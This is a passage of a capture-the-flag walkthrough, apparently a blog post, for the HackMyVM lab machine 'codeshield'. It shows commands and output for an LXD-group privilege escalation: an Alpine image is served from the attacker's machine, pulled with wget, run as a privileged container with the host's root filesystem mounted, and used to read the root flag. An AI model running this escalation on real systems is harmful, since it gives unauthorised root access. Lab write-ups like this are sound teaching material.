[sudo] password for kali: 
Determining the latest release... v3.8
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.8/main/x86
Downloading alpine-keys-2.1-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading apk-tools-static-2.10.6-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading alpine-mirrors-3.5.9-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: OK
Verified OK
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  3264  100  3264    0     0    831      0  0:00:03  0:00:03 --:--:--   832
--2025-05-30 04:04:20--  http://alpine.mirror.wearetriple.com/MIRRORS.txt
Resolving alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)... 93.187.10.24, 2a00:1f00:dc06:10::6
Connecting to alpine.mirror.wearetriple.com (alpine.mirror.wearetriple.com)|93.187.10.24|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3264 (3.2K) [text/plain]
Saving to: ‘/home/kali/temp/codeshield/lxd-alpine-builder/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’

/home/kali/temp/codeshield/lxd-alpine-builder/r 100%[====================================================================================================>]   3.19K  --.-KB/s    in 0s      

2025-05-30 04:04:21 (9.01 MB/s) - ‘/home/kali/temp/codeshield/lxd-alpine-builder/rootfs/usr/share/alpine-mirrors/MIRRORS.txt’ saved [3264/3264]

Selecting mirror http://mirrors.ocf.berkeley.edu/alpine//v3.8/main
fetch http://mirrors.ocf.berkeley.edu/alpine//v3.8/main/x86/APKINDEX.tar.gz
(1/18) Installing musl (1.1.19-r11)
(2/18) Installing busybox (1.28.4-r3)
Executing busybox-1.28.4-r3.post-install
(3/18) Installing alpine-baselayout (3.1.0-r0)
Executing alpine-baselayout-3.1.0-r0.pre-install
Executing alpine-baselayout-3.1.0-r0.post-install
(4/18) Installing openrc (0.35.5-r5)
Executing openrc-0.35.5-r5.post-install
(5/18) Installing alpine-conf (3.8.0-r0)
(6/18) Installing libressl2.7-libcrypto (2.7.5-r0)
(7/18) Installing libressl2.7-libssl (2.7.5-r0)
(8/18) Installing libressl2.7-libtls (2.7.5-r0)
(9/18) Installing ssl_client (1.28.4-r3)
(10/18) Installing zlib (1.2.11-r1)
(11/18) Installing apk-tools (2.10.6-r0)
(12/18) Installing busybox-suid (1.28.4-r3)
(13/18) Installing busybox-initscripts (3.1-r4)
Executing busybox-initscripts-3.1-r4.post-install
(14/18) Installing scanelf (1.2.3-r0)
(15/18) Installing musl-utils (1.1.19-r11)
(16/18) Installing libc-utils (0.7.1-r0)
(17/18) Installing alpine-keys (2.1-r1)
(18/18) Installing alpine-base (3.8.5-r0)
Executing busybox-1.28.4-r3.trigger
OK: 7 MiB in 18 packages

┌──(kali💀kali)-[~/temp/codeshield/lxd-alpine-builder]
└─$ ls -la
total 5848
drwxr-xr-x 3 kali kali    4096 May 30 04:04 .
drwxr-xr-x 5 kali kali    4096 May 30 04:03 ..
-rw-r--r-- 1 kali kali 3259593 May 30 04:03 alpine-v3.13-x86_64-20210218_0139.tar.gz
-rw-r--r-- 1 root root 2674459 May 30 04:04 alpine-v3.8-i686-20250530_0404.tar.gz
-rwxr-xr-x 1 kali kali    8051 May 30 04:04 build-alpine
drwxr-xr-x 8 kali kali    4096 May 30 04:03 .git
-rw-r--r-- 1 kali kali   26530 May 30 04:03 LICENSE
-rw-r--r-- 1 kali kali     768 May 30 04:03 README.md

┌──(kali💀kali)-[~/temp/codeshield/lxd-alpine-builder]
└─$ python3 -m http.server 8888        
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130

# codeshield
earlyp@codeshield:~$ cd /tmp
earlyp@codeshield:/tmp$ wget http://10.0.2.4:8888/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2025-05-30 08:06:48--  http://10.0.2.4:8888/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 10.0.2.4:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’

alpine-v3.13-x86_64-20210218_0139.tar.gz        100%[====================================================================================================>]   3.11M  --.-KB/s    in 0.07s   

2025-05-30 08:06:48 (42.6 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]

earlyp@codeshield:/tmp$ lxc image import ./alpine*.tar.gz --alias myimage
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first container, try: lxc launch ubuntu:22.04
Or for a virtual machine: lxc launch ubuntu:22.04 --vm

Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
earlyp@codeshield:/tmp$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (dir, lvm, zfs, btrfs, ceph, cephobject) [default=zfs]: 
Create a new ZFS pool? (yes/no) [default=yes]: 
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: 
Size in GiB of the new loop device (1GiB minimum) [default=9GiB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
Would you like the LXD server to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]: 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 

earlyp@codeshield:/tmp$ 
earlyp@codeshield:/tmp$ lxc init myimage mycontainer -c security.privileged=true
Creating mycontainer
earlyp@codeshield:/tmp$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to mycontainer
earlyp@codeshield:/tmp$ lxc start mycontainer
earlyp@codeshield:/tmp$ lxc exec mycontainer /bin/sh
~ # whoami;id;pwd
root
uid=0(root) gid=0(root)
/root
~ # ls -la
total 3
drwx------    2 root     root             3 May 30 08:09 .
drwxr-xr-x   19 root     root            19 May 30 08:08 ..
-rw-------    1 root     root            21 May 30 08:09 .ash_history
~ # cd /mnt/root
/mnt/root # ls -la
total 4005969
drwxr-xr-x   19 root     root          4096 Aug 22  2023 .
drwxr-xr-x    3 root     root             3 May 30 08:08 ..
lrwxrwxrwx    1 root     root             7 Aug 10  2023 bin -> usr/bin
drwxr-xr-x    4 root     root          4096 Aug 23  2023 boot
drwxr-xr-x   20 root     root          4240 May 30 06:20 dev
drwxr-xr-x  164 root     root         12288 Aug 30  2023 etc
drwxr-xr-x   14 root     root          4096 Aug 26  2023 home
lrwxrwxrwx    1 root     root             7 Aug 10  2023 lib -> usr/lib
lrwxrwxrwx    1 root     root             9 Aug 10  2023 lib32 -> usr/lib32
lrwxrwxrwx    1 root     root             9 Aug 10  2023 lib64 -> usr/lib64
lrwxrwxrwx    1 root     root            10 Aug 10  2023 libx32 -> usr/libx32
drwx------    2 root     root         16384 Aug 22  2023 lost+found
drwxr-xr-x    3 root     root          4096 May 30 08:07 media
drwxr-xr-x    2 root     root          4096 Aug 10  2023 mnt
drwxr-xr-x    7 root     root          4096 Aug 26  2023 opt
dr-xr-xr-x  368 root     root             0 May 30 06:17 proc
drwx------    9 root     root          4096 Aug 26  2023 root
drwxr-xr-x   50 root     root          1380 May 30 06:51 run
lrwxrwxrwx    1 root     root             8 Aug 10  2023 sbin -> usr/sbin
drwxr-xr-x   12 root     root          4096 Aug 30  2023 snap
drwxr-xr-x    3 root     root          4096 Aug 22  2023 srv
-rw-------    1 root     root     4102029312 Aug 22  2023 swap.img
dr-xr-xr-x   13 root     root             0 May 30 06:17 sys
drwxrwxrwt   25 root     root          4096 May 30 08:09 tmp
drwxr-xr-x   14 root     root          4096 Aug 10  2023 usr
drwxr-xr-x   16 root     root          4096 Aug 26  2023 var
/mnt/root # cd root
/mnt/root/root # ls -la
total 96
drwx------    9 root     root          4096 Aug 26  2023 .
drwxr-xr-x   19 root     root          4096 Aug 22  2023 ..
-rw-------    1 root     root            26 May 30 07:53 .bash_history
-rw-r--r--    1 root     root          3106 Oct 15  2021 .bashrc
drwx------    2 root     root          4096 Aug 28  2023 .cache
drwxr-xr-x    3 root     root          4096 Aug 26  2023 .iredmail
drwx------    3 root     root          4096 Aug 23  2023 .launchpadlib
-rw-------    1 root     root            20 Aug 23  2023 .lesshst
drwxr-xr-x    3 root     root          4096 Aug 22  2023 .local
-r--------    1 root     root            45 Aug 26  2023 .my.cnf
-rw-r--r--    1 root     root            91 Aug 26  2023 .my.cnf-amavisd
-rw-r--r--    1 root     root            92 Aug 26  2023 .my.cnf-fail2ban
-rw-r--r--    1 root     root            93 Aug 26  2023 .my.cnf-iredadmin
-rw-r--r--    1 root     root            91 Aug 26  2023 .my.cnf-iredapd
-rw-r--r--    1 root     root            93 Aug 26  2023 .my.cnf-roundcube
-r--------    1 root     root            89 Aug 26  2023 .my.cnf-vmail
-r--------    1 root     root            94 Aug 26  2023 .my.cnf-vmailadmin
-rw-r--r--    1 root     root           161 Jul  9  2019 .profile
-rw-r--r--    1 root     root            66 Aug 26  2023 .selected_editor
drwx------    2 root     root          4096 Aug 22  2023 .ssh
-rw-r--r--    1 root     root             0 Aug 22  2023 .sudo_as_admin_successful
-rw-r--r--    1 root     root           290 Aug 26  2023 .wget-hsts
drwxr-xr-x    2 root     root          4096 Aug 26  2023 cowrie
-rw-r--r--    1 root     root          2528 Aug 26  2023 root.txt
drwx------    4 root     root          4096 Aug 22  2023 snap
/mnt/root/root # cat root.txt 

             @@@                            
      @@@@@@@@@  @@@@@@                     
 @@@@@@@@@@@@@@          (@@                
 @@@@@@@@@@@@@@           @@    ██████╗ ██████╗ ██████╗ ███████╗███████╗██╗  ██╗██╗███████╗██╗     ██████╗                                   
 @@@@@@@@@@@@@@           @@   ██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝██║  ██║██║██╔════╝██║     ██╔══██╗             
  @@@@@@@@@@@@@          @@    ██║     ██║   ██║██║  ██║█████╗  ███████╗███████║██║█████╗  ██║     ██║  ██║             
  @@@@@@@@@@@@@         @@@    ██║     ██║   ██║██║  ██║██╔══╝  ╚════██║██╔══██║██║██╔══╝  ██║     ██║  ██║             
    @@@@@@@@@@@        @@      ╚██████╗╚██████╔╝██████╔╝███████╗███████║██║  ██║██║███████╗███████╗██████╔╝             
     @@@@@@@@@@      @@@        ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚══════╝╚═════╝              
        @@@@@@@   @@@                       
           @@@@@@@                                                           

  _______________________________________________________________________________________________________
 |  _ROOT FLAG!________________________________________________________________________________________  |
 | |                                                                                                   | |
 | | Educate_your_employees_on_password_safety                                                         | |
 | |                                                                                                   | |
 | |___________________________________________________________________________________________________| |
 |_______________________________________________________________________________________________________|

同样可以拿到shell!

Training platform, Hackmyvm
Hackmyvm web
本文由作者按照 CC BY 4.0 进行授权